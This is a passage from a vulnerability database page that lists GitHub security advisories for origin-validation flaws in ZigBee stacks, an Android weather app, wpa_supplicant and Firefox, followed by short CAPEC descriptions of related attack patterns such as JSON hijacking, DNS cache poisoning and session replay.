      "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10705"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00006.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00012.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.vmware.com/pipermail/security-announce/2009/000060.html"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/34731"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/34750"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/34753"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/34771"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/34776"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/34785"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/34787"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/34801"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/35766"
    },
    {
      "type": "WEB",
      "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2009\u0026m=slackware-security.446399"
    },
    {
      "type": "WEB",
      "url": "http://wiki.rpath.com/Advisories:rPSA-2009-0063"
    },
    {
      "type": "WEB",
      "url": "http://wiki.rpath.com/wiki/Advisories:rPSA-2009-0063"
    },
    {
      "type": "WEB",
      "url": "http://www.debian.org/security/2009/dsa-1772"
    },
    {
      "type": "WEB",
      "url": "http://www.gentoo.org/security/en/glsa/glsa-200904-18.xml"
    },
    {
      "type": "WEB",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:103"
    },
    {
      "type": "WEB",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:104"
    },
    {
      "type": "WEB",
      "url": "http://www.redhat.com/support/errata/RHSA-2009-0427.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/502752/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/504849/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/34536"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id?1022067"
    },
    {
      "type": "WEB",
      "url": "http://www.ubuntu.com/usn/usn-758-1"
    },
    {
      "type": "WEB",
      "url": "http://www.vmware.com/security/advisories/VMSA-2009-0009.html"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2009/1053"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2009/1865"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-3FCC-QFQW-WQR5

Vulnerability from github – Published: 2025-01-15 09:30 – Updated: 2026-04-20 18:31
VLAI
Details

A ZigBee coordinator, router, or end device may change their node ID when an unsolicited encrypted rejoin response is received, this change in node ID causes Denial of Service (DoS). To recover from this DoS, the network must be re-established

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-7322"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-346",
      "CWE-940"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-15T08:15:26Z",
    "severity": "MODERATE"
  },
  "details": "A ZigBee coordinator, router, or end device may change their node ID when an unsolicited encrypted rejoin response is received, this change\u00a0in node ID causes Denial of Service (DoS). To recover from this DoS, the network must be re-established",
  "id": "GHSA-3fcc-qfqw-wqr5",
  "modified": "2026-04-20T18:31:42Z",
  "published": "2025-01-15T09:30:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7322"
    },
    {
      "type": "WEB",
      "url": "https://community.silabs.com/068Vm00000I7ri2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3FWG-2C37-RVFX

Vulnerability from github – Published: 2023-05-31 00:31 – Updated: 2024-04-04 04:24
VLAI
Details

An issue found in BestWeather v.7.3.1 for Android allows unauthorized apps to cause a persistent denial of service attack by manipulating the database.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-29743"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-346"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-05-30T23:15:09Z",
    "severity": "HIGH"
  },
  "details": "An issue found in BestWeather v.7.3.1 for Android allows unauthorized apps to cause a persistent denial of service attack by manipulating the database.",
  "id": "GHSA-3fwg-2c37-rvfx",
  "modified": "2024-04-04T04:24:25Z",
  "published": "2023-05-31T00:31:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29743"
    },
    {
      "type": "WEB",
      "url": "https://github.com/LianKee/SO-CVEs/blob/main/CVEs/CVE-2023-29743/CVE%20detail.md"
    },
    {
      "type": "WEB",
      "url": "https://play.google.com/store/apps/details?id=com.icoolme.android.weather"
    },
    {
      "type": "WEB",
      "url": "http://www.zmtqsh.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3GC7-G84M-84JC

Vulnerability from github – Published: 2026-09-11 18:31 – Updated: 2026-09-11 21:31
VLAI
Details

An issue in wpa_supplicant all versions before v.2.12 allows a local attacker to bypass proper network context and AKMP matching for PMKSA caching via missing validation in the driver based PMKSA selection path in wpa.c

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-78807"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-346"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-09-11T18:16:58Z",
    "severity": "HIGH"
  },
  "details": "An issue in wpa_supplicant all versions before v.2.12 allows a local attacker to bypass proper network context and AKMP matching for PMKSA caching via missing validation in the driver based PMKSA selection path in wpa.c",
  "id": "GHSA-3gc7-g84m-84jc",
  "modified": "2026-09-11T21:31:17Z",
  "published": "2026-09-11T18:31:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78807"
    },
    {
      "type": "WEB",
      "url": "https://w1.fi/security/2026-2/missing-network-context-validation-for-pmksa-caching.txt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3H25-CXXM-9425

Vulnerability from github – Published: 2022-05-13 01:23 – Updated: 2022-05-13 01:23
VLAI
Details

The (1) WebGL.compressedTexImage2D and (2) WebGL.compressedTexSubImage2D functions in Mozilla Firefox before 28.0 and SeaMonkey before 2.25 allow remote attackers to bypass the Same Origin Policy and render content in a different domain via unspecified vectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2014-1502"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-346"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2014-03-19T10:55:00Z",
    "severity": "MODERATE"
  },
  "details": "The (1) WebGL.compressedTexImage2D and (2) WebGL.compressedTexSubImage2D functions in Mozilla Firefox before 28.0 and SeaMonkey before 2.25 allow remote attackers to bypass the Same Origin Policy and render content in a different domain via unspecified vectors.",
  "id": "GHSA-3h25-cxxm-9425",
  "modified": "2022-05-13T01:23:26Z",
  "published": "2022-05-13T01:23:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-1502"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=972622"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/201504-01"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2014-03/msg00016.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2014-03/msg00017.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2014-03/msg00022.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00016.html"
    },
    {
      "type": "WEB",
      "url": "http://www.mozilla.org/security/announce/2014/mfsa2014-22.html"
    },
    {
      "type": "WEB",
      "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

No mitigation information available for this CWE.

CAPEC-111: JSON Hijacking (aka JavaScript Hijacking)

An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser's Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website.

CAPEC-141: Cache Poisoning

An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. The targeted cache can be an application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value.

CAPEC-142: DNS Cache Poisoning

A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An adversary modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the adversary specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. Adversaries can use this to herd clients to sites that install malware on the victim's computer or to masquerade as part of a Pharming attack.

CAPEC-160: Exploit Script-Based APIs

Some APIs support scripting instructions as arguments. Methods that take scripted instructions (or references to scripted instructions) can be very flexible and powerful. However, if an attacker can specify the script that serves as input to these methods they can gain access to a great deal of functionality. For example, HTML pages support <script> tags that allow scripting languages to be embedded in the page and then interpreted by the receiving web browser. If the content provider is malicious, these scripts can compromise the client application. Some applications may even execute the scripts under their own identity (rather than the identity of the user providing the script) which can allow attackers to perform activities that would otherwise be denied to them.

CAPEC-21: Exploitation of Trusted Identifiers

An adversary guesses, obtains, or "rides" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.

CAPEC-384: Application API Message Manipulation via Man-in-the-Middle

An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack can allow the attacker to gain unauthorized privileges within the application, or conduct attacks such as phishing, deceptive strategies to spread malware, or traditional web-application attacks. The techniques require use of specialized software that allow the attacker to perform adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system. Despite the use of AiTH software, the attack is actually directed at the server, as the client is one node in a series of content brokers that pass information along to the application framework. Additionally, it is not true "Adversary-in-the-Middle" attack at the network layer, but an application-layer attack the root cause of which is the master applications trust in the integrity of code supplied by the client.

CAPEC-385: Transaction or Event Tampering via Application API Manipulation

An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.

CAPEC-386: Application API Navigation Remapping

An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of links/buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains links/buttons that point to an attacker controlled destination. Some applications make navigation remapping more difficult to detect because the actual HREF values of images, profile elements, and links/buttons are masked. One example would be to place an image in a user's photo gallery that when clicked upon redirected the user to an off-site location. Also, traditional web vulnerabilities (such as CSRF) can be constructed with remapped buttons or links. In some cases navigation remapping can be used for Phishing attacks or even means to artificially boost the page view, user site reputation, or click-fraud.

CAPEC-387: Navigation Remapping To Propagate Malicious Content

An adversary manipulates either egress or ingress data from a client within an application framework in order to change the content of messages and thereby circumvent the expected application logic.

CAPEC-388: Application API Button Hijacking

An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains buttons that point to an attacker controlled destination.

CAPEC-510: SaaS User Request Forgery

An adversary, through a previously installed malicious application, performs malicious actions against a third-party Software as a Service (SaaS) application (also known as a cloud based application) by leveraging the persistent and implicit trust placed on a trusted user's session. This attack is executed after a trusted user is authenticated into a cloud service, "piggy-backing" on the authenticated session, and exploiting the fact that the cloud service believes it is only interacting with the trusted user. If successful, the actions embedded in the malicious application will be processed and accepted by the targeted SaaS application and executed at the trusted user's privilege level.

CAPEC-59: Session Credential Falsification through Prediction

This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.

CAPEC-60: Reusing Session IDs (aka Session Replay)

This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.

CAPEC-75: Manipulating Writeable Configuration Files

Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

CAPEC-89: Pharming

A pharming attack occurs when the victim is fooled into entering sensitive data into supposedly trusted locations, such as an online bank site or a trading platform. An attacker can impersonate these supposedly trusted sites and have the victim be directed to their site rather than the originally intended one. Pharming does not require script injection or clicking on malicious links for the attack to succeed.